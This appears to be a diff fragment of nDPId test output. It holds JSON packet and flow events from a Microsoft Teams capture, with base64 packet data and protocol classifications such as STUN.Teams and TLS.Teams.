00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1587041693597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693597,"pkt":"EBMx8Tl2KDc3AG3ICABFAADyLLYAAEARXJfAqAEGNHL6jcNgDZYA3iTJAAMAwiESpEIiL+\/H85JL0bmXJ+QADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIfyDE3U+EjfoAFAAUAk7L+IJ6YNZTBt6\/p32H0UQC3V0AFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACB+ROZSH0cQpVQPYpCmfWn5X6jy8HHHqFihd3XDn9tzDQ=="}
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2510,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041693609,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2510,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041693609,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2510,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041693611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2510,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041693611}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1587041693611,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693611,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgfyMAAEARCrzAqAEGNHL6jcNhDZYATBjuAAMAMCESpELalY8VcoE3uJ+0vVMADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1587041693611,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693611,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgfyMAAEARCrzAqAEGNHL6jcNhDZYATBjuAAMAMCESpELalY8VcoE3uJ+0vVMADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="}
00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
@@ -452,8 +452,8 @@
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2637,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1587041694262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041694262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0VplAAGwGdII0ck2IwKgBBgG77Jdw4z8APJqWp4AS\/\/+58wAAAgQFoAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2637,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1587041694262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041694262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0VplAAGwGdII0ck2IwKgBBgG77Jdw4z8APJqWp4AS\/\/+58wAAAgQFoAEDAwgBAQQC"}
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2638,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1587041694262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041694262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG9yfAqAEGNHJNiOyXAbs8mpancOM\/AVAQIADasgAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2638,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1587041694262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041694262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG9yfAqAEGNHJNiOyXAbs8mpancOM\/AVAQIADasgAA"}
00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2639,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041694219,"flow_last_seen":1587041694263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041694263,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.flightproxy.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2639,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041694219,"flow_last_seen":1587041694263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041694263,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.flightproxy.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2658,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041694571,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2658,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041694571,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2658,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041694611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2658,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041694611}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1587041695278,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695278,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMhisAAEARcdvAqAEGwKgABMNgw1UAeNtRAAEAXCESpELGQpqANK6irJWNCoEABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUNaR7w6XgHLmtRZxpBWKVkGuwhq2AKAAE+3W4lQ=="} 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1587041695278,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":1587041695278,"pkt":"EBMx8Tl2KDc3AG3ICABFAACMhisAAEARcdvAqAEGwKgABMNgw1UAeNtRAAEAXCESpELGQpqANK6irJWNCoEABgAJbzUvSTpGWTMyAAAAgCoACAAAf4pShlgAgHAABAAAAAeANgAEAAAAAQAkAARu\/\/7\/gDcABAAAAAIACAAUNaR7w6XgHLmtRZxpBWKVkGuwhq2AKAAE+3W4lQ=="}
00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
@@ -474,8 +474,8 @@
00805{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2675,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1587041695381,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1587041695381,"pkt":"EBMx8Tl2KDc3AG3ICABFAAEsXTYAAEARK+HAqAEGNHL6icN0DZYBGMK2AAQA\/CESpEIeamDBSEqcaMKGtFYADwAEcsZLxoAIAAQAAAAGAAYAOAIAACSQoNvbAdYZTeIVN7\/JkqADMnMa8b7cVproO9WrAAAAAL9xsnbJeBOo3e\/rXLx5Oid6TOY8ABEACAABP81dR27NABMAfAABAGghEqRCa6gY9jQ3F4QYLRqEAAYACUpGd2o6K21JdgAAAIAqAAgAAH+KUoZYAIBwAAQAAAAHgDYABAAAAAEAJAAEbv\/4\/4CVAAhb5VsGDC2J+oA3AAQAAAACAAgAFGPigS6EUGSGggUbRbFSk1APqJ0agCgABKpfQ2cACAAguGTqGqFZLfExfohAPRW3NYW9D0LDg15vdpj82BiyuIs="} 00805{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2675,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1587041695381,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1587041695381,"pkt":"EBMx8Tl2KDc3AG3ICABFAAEsXTYAAEARK+HAqAEGNHL6icN0DZYBGMK2AAQA\/CESpEIeamDBSEqcaMKGtFYADwAEcsZLxoAIAAQAAAAGAAYAOAIAACSQoNvbAdYZTeIVN7\/JkqADMnMa8b7cVproO9WrAAAAAL9xsnbJeBOo3e\/rXLx5Oid6TOY8ABEACAABP81dR27NABMAfAABAGghEqRCa6gY9jQ3F4QYLRqEAAYACUpGd2o6K21JdgAAAIAqAAgAAH+KUoZYAIBwAAQAAAAHgDYABAAAAAEAJAAEbv\/4\/4CVAAhb5VsGDC2J+oA3AAQAAAACAAgAFGPigS6EUGSGggUbRbFSk1APqJ0agCgABKpfQ2cACAAguGTqGqFZLfExfohAPRW3NYW9D0LDg15vdpj82BiyuIs="}
00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2677,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1587041695389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1587041695389,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC4fJgAAGwR4O40cvqNwKgBBg2Ww2AApNd+ARUAiMLWdk9T8dgTMFhVlH2+EmsADwAEcsZLxgASAAgAAT\/MXUduzQATAHAAAQBcIRKkQpOT7iqoT5owckEG1gAGAAlGWTMyOm81L0kAAACAKQAIAAB\/7V4FjgCAcAAEAAAAB4A2AAQAAAABACQABG7\/\/f6ANwAEAAAAAgAIABQwsyB\/3AcVNGFmgIYtfHOO0Vm54oAoAAR90b9H"} 00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2677,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1587041695389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1587041695389,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC4fJgAAGwR4O40cvqNwKgBBg2Ww2AApNd+ARUAiMLWdk9T8dgTMFhVlH2+EmsADwAEcsZLxgASAAgAAT\/MXUduzQATAHAAAQBcIRKkQpOT7iqoT5owckEG1gAGAAlGWTMyOm81L0kAAACAKQAIAAB\/7V4FjgCAcAAEAAAAB4A2AAQAAAABACQABG7\/\/f6ANwAEAAAAAgAIABQwsyB\/3AcVNGFmgIYtfHOO0Vm54oAoAAR90b9H"}
00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2678,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1587041695389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1587041695389,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC4VxkAAGwRBnI0cvqJwKgBBg2Ww3QApCdjARUAiE\/LrilDXPJWtp6yDikzcPIADwAEcsZLxgASAAgAAT\/NXUduzQATAHAAAQBcIRKkQlPk9TFAsI2GK+OZoAAGAAkrbUl2OkpGd2oAAACAKQAIAAB\/7V4FjgCAcAAEAAAAB4A2AAQAAAABACQABG7\/\/f6ANwAEAAAAAgAIABQqoNaJl5j6Qph3wmShySpejyG1ZYAoAAR\/OzfK"} 00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2678,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1587041695389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1587041695389,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC4VxkAAGwRBnI0cvqJwKgBBg2Ww3QApCdjARUAiE\/LrilDXPJWtp6yDikzcPIADwAEcsZLxgASAAgAAT\/NXUduzQATAHAAAQBcIRKkQlPk9TFAsI2GK+OZoAAGAAkrbUl2OkpGd2oAAACAKQAIAAB\/7V4FjgCAcAAEAAAAB4A2AAQAAAABACQABG7\/\/f6ANwAEAAAAAgAIABQqoNaJl5j6Qph3wmShySpejyG1ZYAoAAR\/OzfK"}
00372{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2681,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041695407,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2681,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041695407,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2681,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041695413} 00185{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2681,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041695413}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695421,"flow_last_seen":1587041695421,"flow_idle_time":180000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695421,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695421,"flow_last_seen":1587041695421,"flow_idle_time":180000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695421,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1587041695421,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1587041695421,"pkt":"KDc3AG3IEBMx8Tl2CABFAACYUPwAAGwRCyM0cvwVwKgBBg2Yw3QAhCaSAAEAaCESpEK59F1PLtIJs2rQCYoABgAJK21JdjpKRndqAAAAgCkACAAAf+1eBY4AgHAABAAAAAeANgAEAAAAAQAkAARu\/\/n+gJUACGUfNM4ueRX8gDcABAAAAAIACAAUDNg3puCxSSnyiCvs+zLb4wfWy9WAKAAEDuovdw=="} 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1587041695421,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1587041695421,"pkt":"KDc3AG3IEBMx8Tl2CABFAACYUPwAAGwRCyM0cvwVwKgBBg2Yw3QAhCaSAAEAaCESpEK59F1PLtIJs2rQCYoABgAJK21JdjpKRndqAAAAgCkACAAAf+1eBY4AgHAABAAAAAeANgAEAAAAAQAkAARu\/\/n+gJUACGUfNM4ueRX8gDcABAAAAAIACAAUDNg3puCxSSnyiCvs+zLb4wfWy9WAKAAEDuovdw=="}
00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2682,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695421,"flow_last_seen":1587041695421,"flow_idle_time":180000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695421,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}} 